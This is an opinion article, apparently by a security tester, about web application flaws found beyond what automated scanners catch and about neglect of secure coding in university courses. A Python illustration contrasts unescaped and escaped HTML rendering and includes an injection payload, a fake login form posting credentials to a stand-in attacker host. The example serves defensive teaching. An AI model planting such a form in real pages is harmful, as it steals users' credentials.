
The application servers sat behind the newest firewalls, equipped with state-of-the-art application-layer protection. Sure enough, running the automated tools gave this setup a pretty clean bill of health. What they tend not to be so good at checking is the fresh application code, so recently turned out by the application programmers themselves.
And this is where the problems began. As we started checking the application-specific elements, it didn't take long to compromise the system. We soon found ways to delete content belonging to other portal users, upload malware to the download areas, and send emails carrying a malicious payload from the site.
Even more alarming, it turned out to be easy to inject our own code onto the front page of the site. To make the implications clear, we constructed a fake login box that let us harvest users' credentials as they logged on. In just a few minutes, it was possible to completely own the site.
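To make the mechanics concrete, here is a minimal, hypothetical sketch in Python of the class of flaw involved: user-supplied content dropped into a page without output encoding, which is all an attacker needs to plant a convincing fake login form. The names (PAGE_TEMPLATE, render_unsafe, render_safe) and the attacker URL are invented for illustration and bear no relation to the portal we tested.

```python
import html

# Hypothetical illustration only: a page that echoes a user-supplied comment.
PAGE_TEMPLATE = "<html><body><h1>Latest comment</h1>{comment}</body></html>"

def render_unsafe(comment: str) -> str:
    # Vulnerable: the comment is dropped straight into the markup.
    return PAGE_TEMPLATE.format(comment=comment)

def render_safe(comment: str) -> str:
    # Output encoding turns any injected markup into inert text.
    return PAGE_TEMPLATE.format(comment=html.escape(comment))

# An attacker's "comment": a fake login box posting credentials off-site.
payload = (
    '<form action="https://attacker.example/steal" method="post">'
    'Session expired, please log in again:<br>'
    'User <input name="u"> Pass <input name="p" type="password">'
    '<input type="submit" value="Log in"></form>'
)

if __name__ == "__main__":
    print(render_unsafe(payload))  # a browser would render a working fake login form
    print(render_safe(payload))    # a browser would show the payload as harmless text
```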
This is not an isolated example: today's installations can withstand the automated attacks typified by Code Red (or the white hat's automated testing tools), but move up the application stack and vulnerabilities can easily be found, without a great deal of skill or knowledge on the attacker's part.
While the possibilities for a large-scale automated attack such as Nimda are reduced, the field is ripe for one-off hits; the recent MySpace worm is a good example. These attacks could be used to bring down a site, gain access to key information or set up a phishing site. And there are plenty of them around.
Put simply, today's security issues are no longer about technologies, but increasingly about the human element in the implementation of those technologies; in a word, mistakes. Errors crop up in four key areas: systems design, development, implementation and operations. While automated tests can help tackle issues in the last two areas, problems with design and development continue to cause the biggest headaches.
Yet these troubles should be avoidable. I've still got my well-thumbed copy of Erich Gamma and co's Design Patterns on my bookshelf. This collection of the common ways to get software design right is on the reading list of most undergraduate software engineering courses. Yet what I see over and over again are the same mistakes being repeated: failure to check input, reliance on easily bypassed client-side validation and, in particular, false assumptions about design - "the interfaces we create will be used the way they are supposed to be".
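As a minimal sketch of the first two mistakes, here is a hypothetical server-side check in Python that re-validates every field rather than trusting whatever the browser's JavaScript claims to have verified; the function and field names (validate_registration, username, quantity) are invented for this example.

```python
import re

# Hypothetical sketch: the server re-validates every field, because client-side
# checks can be bypassed simply by crafting the HTTP request directly.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")

def validate_registration(form: dict) -> list:
    """Return a list of validation errors; an empty list means the input passed."""
    errors = []
    username = form.get("username", "")
    quantity = form.get("quantity", "")

    if not USERNAME_RE.fullmatch(username):
        errors.append("username must be 3-32 letters, digits or underscores")

    # Never assume a numeric field arrives as a sane number just because the
    # form widget in the browser only allows digits.
    if not quantity.isdigit() or not 1 <= int(quantity) <= 100:
        errors.append("quantity must be a whole number between 1 and 100")

    return errors

if __name__ == "__main__":
    # A request crafted outside the browser, skipping any client-side validation.
    print(validate_registration({"username": "<script>", "quantity": "-5"}))
```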
It's disheartening to scan through the syllabuses of the various computing degrees on offer and see very little, if any, mention of security in their coding or architecture and design modules. Where it is mentioned, it is mostly pushed into a specialised niche. There seems to be a real disconnect between the aim of getting people to program and that of getting them to program safely.
The SANS Institute's recent launch of a series of exams and certifications to test the ability of programmers to code securely is a real bright spot, and I hope the initiative is successful. The exams are intended to gauge the coder's ability to identify and correct common programming errors that lead to vulnerabilities.
It's high time for the universities and colleges to wake up to the realities of the current decade and stop educating their students in the techniques and environment of the pre-web era.
This year's students will be producing next year's web applications, which means we'll be seeing the same old security mistakes all over again.